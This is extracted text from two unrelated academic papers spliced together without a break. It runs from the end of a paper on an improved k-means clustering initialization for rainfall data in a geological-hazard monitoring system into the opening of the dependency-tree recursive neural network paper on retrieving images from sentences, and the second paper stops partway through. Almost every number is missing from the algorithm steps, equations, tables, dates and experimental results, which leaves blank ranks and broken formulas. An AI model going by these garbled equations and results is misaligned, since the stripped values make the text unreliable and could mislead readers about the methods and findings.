provide a scientific basis for clustering. the source of this research object is the historical monitoring data of the geological disaster monitoring system. from the records of geological monitoring data from to , a representative sample of k-means clustering algorithm for this improved algorithm is selected as the object of study in , and the two samples of d rainfall are randomly selected in different regions. the sample data attributes show as table : table the sample data attributes for the cluster analysis, there are obviously redundant ones in the data attributes of the above geological hazard monitoring system, and it does not have the objectivity of the cluster analysis data. therefore, the redundant ones should be eliminated. finally, only four data object attributes reflecting the characteristics of rainfall data are selected as the research object. the optimized data attributes show as table : field number field name field code type of data id xx number sno yy varchar type type varchar gettime time datatime alarm level alarm integer value value double day value d_value double improved k-means algorithm based on optimizing initial cluster centers and its application table the optimized data attributes . improvement of k-means algorithm for the above geological disaster monitoring system rainfall data characteristics, the k-means algorithm is very sensitive to the initialization center, and the initial clustering center is very easy to make the clustering result into the local optimum and the influence of the isolated point is large. the algorithm is based on the small cluster with the largest variance and can be divided into two clusters with different variance. the algorithm of initializing center is proposed. in addition, a method of isolating points has been proposed. the idea of this algorithm is to first find out the two points furthest from the sample point as the initial center point, and then divide the other sample points into the cluster to which the nearest center point belongs, and determine the number of points within the cluster and whether the corresponding initial clustering center is an isolated point, and finally select the next object to be split according to the variance within the cluster and update the initial cluster center according to certain rules. the above steps are repeated until the number of cluster centers is satisfied. ) initial clustering center selection algorithm x={x ,x ,x …xn}, n is the number of samples. d (xi , xj ) (i, j ∈ { , … n}) is the euclidean distance between the data points xi and xj, ci (i ∈ , …n} is the clustering center, q is the data object that will be spited, s is the number of clustering centers. the initial clustering center selection algorithm is as follows: input: data set x, number of clusters k, threshold u output: cluster center set c and isolated point set d ( ) let q=x={x ,x ,x ,……xn};s= ; ( ) calculate the euclidean distance d (xi,xj) between the two data points in w, and find the two points xi,xj, which are marked as ci, cj, and let: s = s + ; qi = {xp | d(xp,xi)< d(xp,xj),xp ∈ q}, qj = {xp | d(xp,xj)< d(xp,xi),xp ∈ q}, which means q is divided by the cluster ,and qi and qj become the split clusters. ( ) if the number of data objects in qi or qj is less than u, the selected initial center xi or xj is an isolated field number field name field code type of data id xx number sno yy varchar gettime time datatime day value d_value double international journal of advanced network monitoring and controls volume , no. , point. remove xi or xj from q, remove ci or cj in set c, and add xi or xj to d, return to step ; ( ) if the number of data objects in the set c is less than k, find the set qp with the largest variance in the splitting cluster and let q=qpqp ,s=s- , then remove cpcp the set c; ( ) calculate the mean of all the objects in the split cluster, and the resulting mean is k initial clustering centers. ) improved k-means algorithm data set x={x ,x ,x ,……xn}, there are n objects. cold,i represents the i-th cluster center of the previous round, cnew,,i represents the new cluster center calculated in current time, and the algorithm is described as follows: input: data set x, number of clusters k, threshold u output: k clusters and the number of bands ( ) call the improved initialization center selection algorithm to get the initialization center, if there is an isolated point will be isolated points alone in a class, do not participate in the follow-up clustering algorithm; ( ) calculate the distance between all data objects and k cluster centers, and assign the text to the nearest cluster; ( ) calculate the mean of each cluster to obtain a new round of cluster center; ( ) if e’= = , then the iteration is terminated, otherwise it returns to ). (note: e’is the measure function) . experiment analysis . experimental description the data set selected from the experiment comes from the rainfall data collected in the geological hazard detection system and the rainfall data set after the artificial noise is added. the experimental environment is: inter(r)core(tm)i - m, g ram, g hard disk,win operating system. in order to verify the validity and stability of the improved algorithm, the original k-means algorithm, the algorithm in literature [ ]and the improved algorithm are analyzed and compared under the rainfall data set. in order to further verify the superiority of the algorithm in dealing with isolated points, the algorithm is compared with other algorithms on the rainfall data set after adding noise. the clustering results are clustered and criterion function changes and the clustering time are used to evaluate the clustering results. . experimental results and analysis the clustering criterion function of the two algorithms will decrease with the increase of the number of the adjustment of the cluster until the final convergence, and the more compact the two curves, the higher the accuracy of the corresponding clustering results the vice versa. figure is the comparison of the traditional k-means algorithm and the improved algorithm standard function values with the clustering cancroids adjustment and constantly changing the comparison chart.; in order to test the improved k-means algorithm based on optimizing initial cluster centers and its application speed of the improved algorithm in this paper, three samples were randomly selected from the historical data of the geological hazard system, and the sample capacity was , and respectively. the experimental results are shown in figure . figure. the comparison of criterion function changes trend graph figure. the comparison of clustering times in artificial data sets according to the comparison of criterion function change trend graph in the rainfall data set in figure , the clustering criterion function of the improved algorithm is superior to the clustering criterion function value of the traditional k-means algorithm because the data objects in the optimized cluster are more compact and independent in each iteration process, the criterion function value is significantly lower than the traditional k-means algorithm, which also further validates the superiority of this algorithm; figure shows that the traditional k-means algorithm is running at the fastest speed, and the speed of this algorithm is slightly lower than that of algorithm[ ]. . conclusion aiming at the instability of the clustering results caused by the random clustering of the traditional k-means algorithm and the effect of the isolated points on the clustering results, the authors of this paper have the advantages of small distance from the large sample points to the same cluster the clustering algorithm with the largest variance of variance can be split into two clusters with relatively small variance, a k-means clustering algorithm is proposed to optimize the initial clustering center. simulation experiments in geological hazard systems and artificial data sets with the same proportion of noise show that the proposed algorithm improves the accuracy and clustering error compared with the traditional k-means algorithm and the other two optimization initial center algorithms. however, the initial algorithm of the algorithm is somewhat complicated, and it takes too much time in the selection of the central problem. in the future work, it will be further improved, and it will be tried in all respects. international journal of advanced network monitoring and controls volume , no. , references [ ] zhai d h, yu j,gao f,et al. k-means text clustering algorithm based oninitial cluster centers selection according to maximum distance [j]. application research of computers, , ( ): – . [ ] baolin yi,haiquan qiao,fan yang,chenwei xu. an improved initialization center algorithm for k-means clustering[c]. computational intelligence and software engineering, , pp: - . [ ] redmond s j, heneghan c.a method for initializing the k-means clustering algorithm using kd-trees[j]. pattern recognition letters, , ( ): - . [ ] liu j x , zhu g h, xi m. a k-means algorithm based on the radius [j]. journal of guilin university of electronic technology, , ( ): - . [ ] habibpour r, khalipour k. a new k-means and k-nearest-neighbor algorithms for text document clustering [j]. international journal of academic research part a, , ( ) : - . [ ] data mining techniques and applications – a decade review from to [j] . shu-hsien liao,pei-hui chu, pei-yuan hsiao. expert systems with applications . ( ) [ ] application of improved k-means clustering algorithm in transit data collection. ying wu, chun long yao. rd international conference on biomedical engineering and informatics (bmet). . [ ] zhou a w, yu y f. the research about clustering algorithm of k-means [j]. computer technology and development, , ( ): - . [ ] duan g q. auto generation cloud optimization based on genetic algorithm [j]. computer and digital engineering, , ( ): - . [ ] wang c l, zhang j x. improved k-means algorithm based on latent dirichlet allocation for text clustering [j]. journal of computer applications, , ( ): - . [ ] deepa v k,geetha j r r. rapid development of applications in data mining[c]. green high performance computing(icghpc), ,pp: - . [ ] sharma s, agrawal j, agarwal s, et al. machine learning techniques for data mining:a survey[c]. computational intelligence and computing research (iccic), , pp: - . [ ] efficient data clustering algorithms: improvements over kmeans[j] . mohamed abubaker, wesam ashour. international journal of intelligent systems and applications(ijisa) . ( ). [ ] fahad a, alshatri n, tari z, alamri a. a survey of clustering algorithms for big data: taxonomy and empirical analysis[c]. emerging topics in computing. : - . [ ] abubaker m, ashour wesam. efficient data clustering algorithm algorithms: improvemwnts over k-means[j]. i nternational journal of intelligent systems and applications. ( ): - . [ ] tang zhaoxia, zhang hui. improved k-means clustering algorithm based on genetic algorithm[c], telkomnika indonesian journal of electrical engineering. , pp: - . [ ] optimal variable weighting for ultrametric and additive tree clustering[j]. geert soete. quality and quantity . ( ). grounded compositional semantics for finding and describing images with sentences grounded compositional semantics for finding and describing images with sentences richard socher, andrej karpathy, quoc v. le*, christopher d. manning, andrew y. ng stanford university, computer science department, *google inc. richard@socher.org, karpathy@cs.stanford.edu, qvl@google.com, manning@stanford.edu, ang@cs.stanford.edu abstract previous work on recursive neural networks (rnns) shows that these models can produce compositional feature vectors for accurately representing and classifying sentences or im- ages. however, the sentence vectors of previ- ous models cannot accurately represent visu- ally grounded meaning. we introduce the dt- rnn model which uses dependency trees to embed sentences into a vector space in order to retrieve images that are described by those sentences. unlike previous rnn-based mod- els which use constituency trees, dt-rnns naturally focus on the action and agents in a sentence. they are better able to abstract from the details of word order and syntactic expression. dt-rnns outperform other re- cursive and recurrent neural networks, kernel- ized cca and a bag-of-words baseline on the tasks of finding an image that fits a sentence description and vice versa. they also give more similar representations to sentences that describe the same image. introduction single word vector spaces are widely used (turney and pantel, ) and successful at classifying sin- gle words and capturing their meaning (collobert and weston, ; huang et al., ; mikolov et al., ). since words rarely appear in isolation, the task of learning compositional meaning repre- sentations for longer phrases has recently received a lot of attention (mitchell and lapata, ; socher et al., ; socher et al., ; grefenstette et al., ). similarly, classifying whole images into a fixed set of classes also achieves very high perfor- mance (le et al., ; krizhevsky et al., ). however, similar to words, objects in images are of- ten seen in relationships with other objects which are not adequately described by a single label. in this work, we introduce a model, illustrated in fig. , which learns to map sentences and images into a common embedding space in order to be able to retrieve one from the other. we assume word and image representations are first learned in their re- spective single modalities but finally mapped into a jointly learned multimodal embedding space. our model for mapping sentences into this space is based on ideas from recursive neural networks (rnns) (pollack, ; costa et al., ; socher et al., b). however, unlike all previous rnn models which are based on constituency trees (ct- rnns), our model computes compositional vector representations inside dependency trees. the com- positional vectors computed by this new dependency tree rnn (dt-rnn) capture more of the meaning of sentences, where we define meaning in terms of similarity to a “visual representation” of the textual description. dt-rnn induced vector representa- tions of sentences are more robust to changes in the syntactic structure or word order than related mod- els such as ct-rnns or recurrent neural networks since they naturally focus on a sentence’s action and its agents. we evaluate and compare dt-rnn induced rep- resentations on their ability to use a sentence such as “a man wearing a helmet jumps on his bike near a beach.” to find images that show such a scene. the goal is to learn sentence representations that capture transactions of the association for computational linguistics, ( ) – . action editor: alexander clark. submitted / ; revised / ; published / . c© association for computational linguistics. a man wearing a helmet jumps on his bike near a beach. compositional sentence vectors two airplanes parked in an airport. a man jumping his downhill bike. image vector representation a small child sits on a cement wall near white flower. multi-modal representations figure : the dt-rnn learns vector representations for sentences based on their dependency trees. we learn to map the outputs of convolutional neural networks applied to images into the same space and can then compare both sentences and images. this allows us to query images with a sentence and give sentence descriptions to images. the visual scene described and to find appropriate images in the learned, multi-modal sentence-image space. conversely, when given a query image, we would like to find a description that goes beyond a single label by providing a correct sentence describ- ing it, a task that has recently garnered a lot of at- tention (farhadi et al., ; ordonez et al., ; kuznetsova et al., ). we use the dataset intro- duced by (rashtchian et al., ) which consists of images, each with descriptions. on all tasks, our model outperforms baselines and related mod- els. related work the presented model is connected to several areas of nlp and vision research, each with a large amount of related work to which we can only do some justice given space constraints. semantic vector spaces and their composition- ality. the dominant approach in semantic vec- tor spaces uses distributional similarities of single words. often, co-occurrence statistics of a word and its context are used to describe each word (turney and pantel, ; baroni and lenci, ), such as tf-idf. most of the compositionality algorithms and related datasets capture two-word compositions. for instance, (mitchell and lapata, ) use two- word phrases and analyze similarities computed by vector addition, multiplication and others. compo- sitionality is an active field of research with many different models and representations being explored (grefenstette et al., ), among many others. we compare to supervised compositional models that can learn task-specific vector representations such as constituency tree recursive neural networks (socher et al., b; socher et al., a), chain structured recurrent neural networks and other baselines. an- other alternative would be to use ccg trees as a backbone for vector composition (k.m. hermann, ). multimodal embeddings. multimodal embed- ding methods project data from multiple sources such as sound and video (ngiam et al., ) or im- ages and text. socher et al. (socher and fei-fei, ) project words and image regions into a com- mon space using kernelized canonical correlation analysis to obtain state of the art performance in an- notation and segmentation. similar to our work, they use unsupervised large text corpora to learn seman- tic word representations. among other recent work is that by srivastava and salakhutdinov ( ) who developed multimodal deep boltzmann machines. similar to their work, we use techniques from the broad field of deep learning to represent images and words. recently, single word vector embeddings have been used for zero shot learning (socher et al., c). mapping images to word vectors enabled their system to classify images as depicting objects such as ”cat” without seeing any examples of this class. related work has also been presented at nips (socher et al., b; frome et al., ). this work moves zero-shot learning beyond single categories per image and extends it to unseen phrases and full length sentences, making use of similar ideas of se- mantic spaces grounded in visual knowledge. detailed image annotation. interactions be- tween images and texts is a growing research field. early work in this area includes generating single words or fixed phrases from images (duygulu et al., ; barnard et al., ) or using contextual in- formation to improve recognition (gupta and davis, ; torralba et al., ). apart from a large body of work on single object image classification (le et al., ), there is also work on attribute classification and other mid-level elements (kumar et al., ), some of which we hope to capture with our approach as well. our work is close in spirit with recent work in de- scribing images with more detailed, longer textual descriptions. in particular, yao et al. ( ) describe images using hierarchical knowledge and humans in the loop. in contrast, our work does not require hu- man interactions. farhadi et al. ( ) and kulkarni et al. ( ), on the other hand, use a more automatic method to parse images. for instance, the former ap- proach uses a single triple of objects estimated for an image to retrieve sentences from a collection written to describe similar images. it forms representations to describe object, action, and scene. kulkarni et al. ( ) extends their method to describe an im- age with multiple objects. none of these approaches have used a compositional sentence vector repre- sentation and they require specific language gener- ation techniques and sophisticated inference meth- ods. since our model is based on neural networks in- ference is fast and simple. kuznetsova et al. ( ) use a very large parallel corpus to connect images and sentences. feng and lapata ( ) use a large dataset of captioned images and experiments with both extractive (search) and abstractive (generation) models. most related is the very recent work of hodosh et al. ( ). they too evaluate using a ranking mea- sure. in our experiments, we compare to kernelized canonical correlation analysis which is the main technique in their experiments. dependency-tree recursive neural networks in this section we first focus on the dt-rnn model that computes compositional vector representations for phrases and sentences of variable length and syn- tactic type. in section the resulting vectors will then become multimodal features by mapping im- ages that show what the sentence describes to the same space and learning both the image and sen- tence mapping jointly. the most common way of building representa- tions for longer phrases from single word vectors is to simply linearly average the word vectors. while this bag-of-words approach can yield reasonable performance in some tasks, it gives all the words the same weight and cannot distinguish important dif- ferences in simple visual descriptions such as the bike crashed into the standing car. vs. the car crashed into the standing bike.. rnn models (pollack, ; goller and küchler, ; socher et al., b; socher et al., a) pro- vided a novel way of combining word vectors for longer phrases that moved beyond simple averag- ing. they combine vectors with an rnn in binary constituency trees which have potentially many hid- den layers. while the induced vector representations work very well on many tasks, they also inevitably capture a lot of syntactic structure of the sentence. however, the task of finding images from sentence descriptions requires us to be more invariant to syn- tactic differences. one such example are active- passive constructions which can collapse words such as “by” in some formalisms (de marneffe et al., ), relying instead on the semantic relationship of “agent”. for instance, the mother hugged her child. and the child was hugged by its mother. should map to roughly the same visual space. cur- rent recursive and recurrent neural networks do not exhibit this behavior and even bag of words rep- resentations would be influenced by the words was and by. the model we describe below focuses more on recognizing actions and agents and has the po- tential to learn representations that are invariant to active-passive differences. . dt-rnn inputs: word vectors and dependency trees in order for the dt-rnn to compute a vector repre- sentation for an ordered list of m words (a phrase or sentence), we map the single words to a vector space and then parse the sentence. first, we map each word to a d-dimensional vec- tor. we initialize these word vectors with the un- a man wearing a helmet jumps on his bike near a beach det nsubj partmod det dobj root prep poss pobj prep det pobj figure : example of a full dependency tree for a longer sentence. the dt-rnn will compute vector representations at every word that represents that word and an arbitrary number of child nodes. the final representation is computed at the root node, here at the verb jumps. note that more important activity and object words are higher up in this tree structure. supervised model of huang et al. ( ) which can learn single word vector representations from both local and global contexts. the idea is to construct a neural network that outputs high scores for windows and documents that occur in a large unlabeled corpus and low scores for window-document pairs where one word is replaced by a random word. when such a network is optimized via gradient descent the derivatives backpropagate into a word embedding matrix a which stores word vectors as columns. in order to predict correct scores the vectors in the ma- trix capture co-occurrence statistics. we use d = in all our experiments. the embedding matrix x is then used by finding the column index i of each word: [w] = i and retrieving the corresponding col- umn xw from x. henceforth, we represent an input sentence s as an ordered list of (word,vector) pairs: s = ((w ,xw ), . . . , (wm,xwm )). next, the sequence of words (w , . . . ,wm) is parsed by the dependency parser of de marneffe et al. ( ). fig. shows an example. we can represent a dependency tree d of a sentence s as an ordered list of (child,parent) indices: d(s) = {(i,j)}, where every child word in the sequence i = , . . . ,m is present and has any word j ∈ { , . . . ,m}∪ { } as its parent. the root word has as its parent and we notice that the same word can be a parent between zero and m number of times. without loss of generality, we assume that these in- dices form a tree structure. to summarize, the input to the dt-rnn for each sentence is the pair (s,d): the words and their vectors and the dependency tree. . forward propagation in dt-rnns given these two inputs, we now illustrate how the dt-rnn computes parent vectors. we will use the following sentence as a running example: students ride bikes at night . fig. shows its tree and computed vector representations. the depen- students bikes night ride at x x x x x h h h h h figure : example of a dt-rnn tree structure for com- puting a sentence representation in a bottom up fashion. dency tree for this sentence can be summarized by the following set of (child, parent) edges: d = {( , ), ( , ), ( , ), ( , ), ( , )}. the dt-rnn model will compute parent vectors at each word that include all the dependent (chil- dren) nodes in a bottom up fashion using a com- positionality function gθ which is parameterized by all the model parameters θ. to this end, the algo- rithm searches for nodes in a tree that have either (i) no children or (ii) whose children have already been computed and then computes the correspond- ing vector. in our example, the words x ,x ,x are leaf nodes and hence, we can compute their correspond- ing hidden nodes via: hc = gθ(xc) = f(wvxc) for c = , , , ( ) where we compute the hidden vector at position c via our general composition function gθ. in the case of leaf nodes, this composition function becomes simply a linear layer, parameterized by wv ∈ rn×d, followed by a nonlinearity. we cross-validate over using no nonlinearity (f = id), tanh, sigmoid or rectified linear units (f = max( ,x), but generally find tanh to perform best. the final sentence representation we want to com- pute is at h , however, since we still do not have h , we compute that one next: h = gθ(x ,h ) = f(wvx + wr h ), ( ) where we use the same wv as before to map the word vector into hidden space but we now also have a linear layer that takes as input h , the only child of the fourth node. the matrix wr ∈ rn×n is used because node is the first child node on the right side of node . generally, we have multiple matri- ces for composing with hidden child vectors from the right and left sides: wr· = (wr , . . . ,wrkr ) and wl· = (wl , . . . ,wlkl ). the number of needed ma- trices is determined by the data by simply finding the maximum numbers of left kl and right kr chil- dren any node has. if at test time a child appeared at an even large distance (this does not happen in our test set), the corresponding matrix would be the identity matrix. now that all children of h have their hidden vec- tors, we can compute the final sentence representa- tion via: h = gθ(x ,h ,h ,h ) = ( ) f(wvx + wl h + wr h + wr h ). notice that the children are multiplied by matrices that depend on their location relative to the current node. another modification that improves the mean rank by approximately in image search on the dev set is to weight nodes by the number of words under- neath them and normalize by the sum of words under all children. this encourages the intuitive desidera- tum that nodes describing longer phrases are more important. let `(i) be the number of leaf nodes (words) under node i and c(i,y) be the set of child nodes of node i in dependency tree y. the final com- position function for a node vector hi becomes: hi = f   `(i)  wvxi + ∑ j∈c(i) `(j)wpos(i,j)hj     , ( ) where by definition `(i) = + ∑ j∈c(i) `(j) and pos(i,j) is the relative position of child j with re- spect to node i, e.g. l or r in eq. . . semantic dependency tree rnns an alternative is to condition the weight matrices on the semantic relations given by the dependency parser. we use the collapsed tree formalism of the stanford dependency parser (de marneffe et al., ). with such a semantic untying of the weights, the dt-rnn makes better use of the dependency formalism and could give active-passive reversals similar semantic vector representation. the equation for this semantic dt-rnn (sdt-rnn) is the same as the one above except that the matrices wpos(i,j) are replaced with matrices based on the dependency relationship. there are a total of unique such relationships in the dataset. however, most are very rare. for examples of semantic relationships, see fig. and the model analysis section . . this forward propagation can be used for com- puting compositional vectors and in sec. we will explain the objective function in which these are trained. . comparison to previous rnn models the dt-rnn has several important differences to previous rnn models of socher et al. ( a) and (socher et al., b; socher et al., c). these constituency tree rnns (ct-rnns) use the follow- ing composition function to compute a hidden par- ent vector h from exactly two child vectors (c ,c ) in a binary tree: h = f ( w [ c c ]) , where w ∈ rd× d is the main parameter to learn. this can be rewritten to show the similarity to the dt-rnn as h = f(wl c + wr c ). however, there are several important differences. note first that in previous rnn models the par- ent vectors were of the same dimensionality to be recursively compatible and be used as input to the next composition. in contrast, our new model first maps single words into a hidden space and then par- ent nodes are composed from these hidden vectors. this allows a higher capacity representation which is especially helpful for nodes that have many chil- dren. secondly, the dt-rnn allows for n-ary nodes in the tree. this is an improvement that is possible even for constituency tree ct-rnns but it has not been explored in previous models. third, due to computing parent nodes in con- stituency trees, previous models had the problem that words that are merged last in the tree have a larger weight or importance in the final sentence rep- figure : the architecture of the visual model. this model has sequences of filtering, pooling and local contrast normalization layers. the learnable parameters are the filtering layer. the filters are not shared, i.e., the network is nonconvolutional. resentation. this can be problematic since these are often simple non-content words, such as a leading ‘but,’. while such single words can be important for tasks such as sentiment analysis, we argue that for describing visual scenes the dt-rnn captures the more important effects: the dependency tree struc- tures push the central content words such as the main action or verb and its subject and object to be merged last and hence, by construction, the final sentence representation is more robust to less important ad- jectival modifiers, word order changes, etc. fourth, we allow some untying of weights de- pending on either how far away a constituent is from the current word or what its semantic relationship is. now that we can compute compositional vector representations for sentences, the next section de- scribes how we represent images. learning image representations with neural networks the image features that we use in our experiments are extracted from a deep neural network, replicated from the one described in (le et al., ). the net- work was trained using both unlabeled data (random web images) and labeled data to classify , cat- egories in imagenet (deng et al., ). we then used the features at the last layer, before the classi- fier, as the feature representation in our experiments. the dimension of the feature vector of the last layer is , . the details of the model and its training procedures are as follows. the architecture of the network can be seen in figure . the network takes x pixel images as inputs and has layers. the layers consist of three sequences of filtering, pooling and local con- trast normalization (jarrett et al., ). the pooling function is l pooling of the previous layer (taking the square of the filtering units, summing them up in a small area in the image, and taking the square- root). the local contrast normalization takes inputs in a small area of the lower layer, subtracts the mean and divides by the standard deviation. the network was first trained using an unsuper- vised objective: trying to reconstruct the input while keeping the neurons sparse. in this phase, the net- work was trained on million images randomly sampled from the web. we resized a given image so that its short dimension has pixels. we then cropped a fixed size x pixel image right at the center of the resized image. this means we may dis- card a fraction of the long dimension of the image. after unsupervised training, we used ima- genet (deng et al., ) to adjust the features in the entire network. the imagenet dataset has , categories and million images. the number of images in each category is equal across categories. the , categories are extracted from wordnet. to speed up the supervised training of this net- work, we made a simple modification to the algo- rithm described in le et al. ( ): adding a “bottle- neck” layer in between the last layer and the classi- fier. to reduce the number of connections. we added one “bottleneck” layer which has , units in be- tween the last layer of the network and the softmax layer. this newly-added layer is fully connected to the previous layer and has a linear activation func- tion. the total number of connections of this net- work is approximately . billion. the network was trained again using the super- vised objective of classifying the , classes in imagenet. most features in the networks are local, which allows model parallelism. data parallelism by asynchronous sgd was also employed as in le et al. ( ). the entire training, both unsupervised and supervised, took days on a large cluster of ma- chines. this network achieves . % precision@ on the full imagenet dataset (release fall ). we will use the features at the bottleneck layer as the feature vector z of an image. each scaled and cropped image is presented to our network. the net- work then performs a feedforward computation to compute the values of the bottleneck layer. this means that every image is represented by a fixed length vector of , dimensions. note that during training, no aligned sentence-image data was used and the imagenet classes do not fully intersect with the words used in our dataset. multimodal mappings the previous two sections described how we can map sentences into a d = -dimensional space and how to extract high quality image feature vectors of dimensions. we now define our final multi- modal objective function for learning joint image- sentence representations with these models. our training set consists of n images and their feature vectors zi and each image has sentence descrip- tions si , . . . ,si for which we use the dt-rnn to compute vector representations. see fig. for ex- amples from the dataset. for training, we use a max- margin objective function which intuitively trains pairs of correct image and sentence vectors to have high inner products and incorrect pairs to have low inner products. let vi = wizi be the mapped image vector and yij = dtrnnθ(sij) the composed sen- tence vector. we define s to be the set of all sentence indices and s(i) the set of sentence indices corre- sponding to image i. similarly, i is the set of all im- age indices and i(j) is the image index of sentence j. the set p is the set of all correct image-sentence training pairs (i,j). the ranking cost function to minimize is then: j(wi,θ) = ∑ (i,j)∈p ∑ c∈s\s(i) max( , ∆ −vti yj + vti yc) + ∑ (i,j)∈p ∑ c∈i\i(j) max( , ∆ −vti yj + vtc yj), ( ) where θ are the language composition matrices, and both second sums are over other sentences com- ing from different images and vice versa. the hyper- parameter ∆ is the margin. the margin is found via cross validation on the dev set and usually around . the final objective also includes the regulariza- tion term λ/left(‖θ‖ + ‖wi‖f ). both the visual model and the word vector learning require a very large amount of training data and both have a huge number of parameters. hence, to prevent overfitting, we assume their weights are fixed and only train the dt-rnn parameters wi. if larger training corpora become available in the future, training both jointly becomes feasible and would present a very promis- ing direction. we use a modified version of ada- grad (duchi et al., ) for optimization of both wi and the dt-rnn as well as the other baselines (except kcca). adagrad has achieved good perfor- mance previously in neural networks models (dean et al., ; socher et al., a). we modify it by resetting all squared gradient sums to every epochs. with both images and sentences in the same multimodal space, we can easily query the model for similar images or sentences by finding the nearest neighbors in terms of negative inner products. an alternative objective function is based on the squared loss j(wi,θ) = ∑ (i,j)∈p ‖vi −yj‖ . this requires an alternating minimization scheme that first trains only wi, then fixes wi and trains the dt-rnn weights θ and then repeats this several times. we find that the performance with this ob- jective function (paired with finding similar images using euclidean distances) is worse for all models than the margin loss of eq. . in addition kcca also performs much better using inner products in the multimodal space. experiments we use the dataset of rashtchian et al. ( ) which consists of images, each with sentences. see fig. for examples. we evaluate and compare the dt-rnn in three different experiments. first, we analyze how well the sentence vectors capture similarity in visual meaning. then we analyze image search with query sentences: to query each model with a sen- tence in order to find an image showing that sen- . a woman and her dog watch the cameraman in their living with wooden floors. . a woman sitting on the couch while a black faced dog runs across the floor. . a woman wearing a backpack sits on a couch while a small dog runs on the hardwood floor next to her. . a women sitting on a sofa while a small jack russell walks towards the camera. . white and black small dog walks toward the camera while woman sits on couch, desk and computer seen in the background as well as a pillow, teddy bear and moggie toy on the wood floor. . a man in a cowboy hat check approaches a small red sports car. . the back and left side of a red ferrari and two men admiring it. . the sporty car is admired by passer by. . two men next to a red sports car in a parking lot. . two men stand beside a red sports car. figure : examples from the dataset of images and their sentence descriptions (rashtchian et al., ). sentence length varies greatly and different objects can be mentioned first. hence, models have to be invariant to word ordering. tence’s visual ‘meaning.’ the last experiment de- scribing images by finding suitable sentences does the reverse search where we query the model with an image and try to find the closest textual description in the embedding space. in our comparison to other methods we focus on those models that can also compute fixed, continu- ous vectors for sentences. in particular, we compare to the rnn model on constituency trees of socher et al. ( a), a standard recurrent neural network; a simple bag-of-words baseline which averages the words. all models use the word vectors provided by huang et al. ( ) and do not update them as dis- cussed above. models are trained with their corre- sponding gradients and backpropagation techniques. a standard recurrent model is used where the hidden vector at word index t is computed from the hidden vector at the previous time step and the current word vector: ht = f(whht− + wxxt). during training, we take the last hidden vector of the sentence chain and propagate the error into that. it is also this vector that is used to represent the sentence. other possible comparisons are to the very differ- ent models mentioned in the related work section. these models use a lot more task-specific engineer- ing, such as running object detectors with bounding boxes, attribute classifiers, scene classifiers, crfs for composing the sentences, etc. another line of work uses large sentence-image aligned resources (kuznetsova et al., ), whereas we focus on eas- ily obtainable training data of each modality sepa- rately and a rather small multimodal corpus. in our experiments we split the data into train- ing, development and test images. since there are sentences describing each image, we have training sentences and testing sen- tences. the dataset has unique words, half of which only appear once. hence, the unsupervised, pre-trained semantic word vector representations are crucial. word vectors are not fine tuned during train- ing. hence, the main parameters are the dt-rnn’s wl·,wr· or the semantic matrices of which there are and the image mapping wi. for both dt-rnns the weight matrices are initialized to block identity matrices plus gaussian noise. word vectors and hid- den vectors are set o length . using the develop- ment split, we found λ = . and the learning rate of adagrad to . . the best model uses a mar- gin of ∆ = . inspired by socher and fei-fei ( ) and ho- dosh et al. ( ) we also compare to kernelized canonical correlation analysis (kcca). we use the average of word vectors for describing sentences and the same powerful image vectors as before. we use the code of socher and fei-fei ( ). tech- nically, one could combine the recently introduced deep cca andrew et al. ( ) and train the re- cursive neural network architectures with the cca objective. we leave this to future work. with lin- ear kernels, kcca does well for image search but is worse for sentence self similarity and describing images with sentences close-by in embedding space. all other models are trained by replacing the dt- rnn function in eq. . . similarity of sentences describing the same image in this experiment, we first map all sentences from the test set into the multi-modal space. then for each sentence, we find the nearest neighbor sen- sentences similarity for image model mean rank random . bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . image search model mean rank random . bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . describing images model mean rank random . bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . table : left: comparison of methods for sentence similarity judgments. lower numbers are better since they indicate that sentences describing the same image rank more highly (are closer). the ranks are out of the sentences in the test set. center: comparison of methods for image search with query sentences. shown is the average rank of the single correct image that is being described. right: average rank of a correct sentence description for a query image. tences in terms of inner products. we then sort these neighbors and record the rank or position of the nearest sentence that describes the same im- age. if all the images were very unique and the vi- sual descriptions close-paraphrases and consistent, we would expect a very low rank. however, usually a handful of images are quite similar (for instance, there are various images of airplanes flying, parking, taxiing or waiting on the runway) and sentence de- scriptions can vary greatly in detail and specificity for the same image. table (left) shows the results. we can see that averaging the high quality word vectors already cap- tures a lot of similarity. the chain structure of a standard recurrent neural net performs worst since its representation is dominated by the last words in the sequence which may not be as important as ear- lier words. . image search with query sentences this experiment evaluates how well we can find im- ages that display the visual meaning of a given sen- tence. we first map a query sentence into the vector space and then find images in the same space using simple inner products. as shown in table (center), the new dt-rnn outperforms all other models. . describing images by finding suitable sentences lastly, we repeat the above experiments but with roles reversed. for an image, we search for suitable textual descriptions again simply by finding close- by sentence vectors in the multi-modal embedding space. table (right) shows that the dt-rnn again outperforms related models. fig. assigned to im- image search model mrank bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . describing images model mrank bow . ct-rnn . recurrent nn . kcca . dt-rnn . sdt-rnn . table : results of multimodal ranking when models are trained with a squared error loss and using euclidean dis- tance in the multimodal space. better performance is reached for all models when trained in a max-margin loss and using inner products as in the previous table. ages. the average ranking of . for a correct sen- tence description is out of possible sentences. a random assignment would give an average ranking of . . analysis: squared error loss vs. margin loss we analyze the influence of the multimodal loss function on the performance. in addition, we com- pare using euclidean distances instead of inner prod- ucts. table shows that performance is worse for all models in this setting. . analysis: recall at n vs mean rank hodosh et al. ( ) and other related work use re- call at n as an evaluation measure. recall at n cap- tures how often one of the top n closest vectors were a correct image or sentence and gives a good intu- ition of how a model would perform in a ranking task that presents n such results to a user. below, we compare three commonly used and high performing models: bag of words, kcca and our sdt-rnn on a gray convertible sports car is parked in front of the trees. a close-up view of the headlights of a blue old-fashioned car. black shiny sports car parked on concrete driveway. five cows grazing on a patch of grass between two roadways. a jockey rides a brown and white horse in a dirt corral. a young woman is riding a bay hose in a dirt riding-ring. a white bird pushes a miniature teal shopping cart. a person rides a brown horse. a motocross bike with rider flying through the air. white propeller plane parked in middle of grassy field. the white jet with its landing gear down flies in the blue sky. an elderly woman catches a ride on the back of the bicycle. a green steam train running down the tracks. steamy locomotive speeding thou the forest. a steam engine comes down a train track near trees. a double decker bus is driving by big ben in london. people in an outrigger canoe sail on emerald green water. two people sailing a small white sail boat. behind a cliff, a boat sails away tourist move in on big ben on a typical overcast london day. a group of people sitting around a table on a porch. a group of four people walking past a giant mushroom. a man and women smiling for the camera in a kitchen. a group of men sitting around a table drinking 